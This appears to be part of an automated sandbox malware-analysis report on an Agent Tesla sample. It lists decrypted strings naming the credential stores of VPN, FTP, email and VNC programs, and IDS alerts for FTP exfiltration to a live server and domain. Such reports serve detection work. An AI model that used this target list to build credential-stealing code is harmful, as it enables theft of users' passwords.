                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Private Internet Access
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: %ProgramW6432%
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Private Internet Access\data
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Private Internet Access\data
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \account.json
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: .*"username":"(.*?)"
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: .*"password":"(.*?)"
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Private Internet Access
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: privateinternetaccess.com
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: FileZilla
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: APPDATA
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: APPDATA
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <Server>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <Host>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <Host>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: </Host>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <Port>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: </Port>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <User>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <User>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: </User>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: </Pass>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <Pass>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: </Pass>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: CoreFTP
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: User
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Host
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Port
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: hdfzpysvpzimorhk
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: WinSCP
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: HostName
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: UserName
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: PublicKeyFile
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: PortNumber
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: WinSCP
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ABCDEF
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Flash FXP
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: port
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: user
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: pass
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: quick.dat
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Sites.dat
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \FlashFXP\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \FlashFXP\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: FTP Navigator
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \FTP Navigator\Ftplist.txt
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Server
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: No Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: User
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SmartFTP
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: APPDATA
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: WS_FTP
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: appdata
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: HOST
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: PWD=
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: PWD=
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: FtpCommander
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \cftp\Ftplist.txt
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ;Password=
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ;User=
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ;Server=
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ;Port=
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ;Port=
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ;Password=
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ;User=
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ;Anonymous=
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: FTPGetter
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \FTPGetter\servers.xml
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <server>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <server_ip>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <server_ip>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: </server_ip>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <server_port>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: </server_port>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <server_user_name>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <server_user_name>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: </server_user_name>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <server_user_password>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <server_user_password>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: </server_user_password>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: FTPGetter
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: The Bat!
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: appdata
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \The Bat!
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Account.CFN
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Account.CFN
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Becky!
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: DataDir
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Folder.lst
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Mailbox.ini
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Account
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: PassWd
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Account
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SMTPServer
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Account
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: MailAddress
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Becky!
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Outlook
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Email
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: IMAP Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: POP3 Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: HTTP Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SMTP Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Email
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Email
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Email
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: IMAP Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: POP3 Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: HTTP Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SMTP Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Server
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Windows Mail App
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Email
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Server
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SchemaId
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: pResourceElement
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: pIdentityElement
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: pPackageSid
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: syncpassword
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: mailoutgoing
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: FoxMail
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Executable
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: FoxmailPath
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Storage\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Storage\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \mail
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \mail
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Account.stg
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Account.stg
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: POP3Host
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SMTPHost
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: IncomingServer
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Account
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: MailAddress
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: POP3Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Opera Mail
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: opera:
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: PocoMail
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: appdata
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Pocomail\accounts.ini
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Email
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: POPPass
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SMTPPass
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SMTP
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: eM Client
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: eM Client\accounts.dat
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: eM Client
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Accounts
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: "Username":"
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: "Secret":"
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: "ProviderName":"
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: o6806642kbM7c5
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Mailbird
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SenderIdentities
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Accounts
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Mailbird\Store\Store.db
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Server_Host
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Accounts
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Email
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Username
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: EncryptedPassword
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Mailbird
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Software\ORL\WinVNC3
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: TightVNC
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: TightVNC
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: PasswordViewOnly
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: TightVNC ControlPassword
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ControlPassword
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: TigerVNC
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Software\TigerVNC\Server
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: passwd
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: passwd2
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ProgramFiles
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: passwd
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ProgramFiles
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: passwd2
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ProgramFiles
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: passwd
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ProgramFiles
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: passwd2
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: passwd
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: umVoLahqZn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: umVoLahqZn.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49823 -> 162.241.203.30:21
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49830 -> 162.241.203.30:49139
                        Source: global trafficTCP traffic: 192.168.2.5:49830 -> 162.241.203.30:49139
                        Source: Joe Sandbox ViewIP Address: 162.241.203.30 162.241.203.30
                        Source: Joe Sandbox ViewIP Address: 162.241.203.30 162.241.203.30
                        Source: Joe Sandbox ViewASN Name: OIS1US OIS1US
                        Source: unknownFTP traffic detected: 162.241.203.30:21 -> 192.168.2.5:49823 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:19. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:19. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:19. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: ftp.aminhacorretora.com.br
                        Source: InstallUtil.exe, 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aminhacorretora.com.br
                        Source: InstallUtil.exe, 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.aminhacorretora.com.br
                        Source: umVoLahqZn.exe, 00000000.00000002.2727525135.0000000006761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c0/
                        Source: InstallUtil.exe, 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E2BC58 CreateProcessAsUserW,0_2_07E2BC58
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_013F0B100_2_013F0B10
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_013F14700_2_013F1470
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_015383700_2_01538370
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_0153118E0_2_0153118E
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_015319800_2_01531980
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_01537D480_2_01537D48
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_06524C780_2_06524C78
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_06524C680_2_06524C68
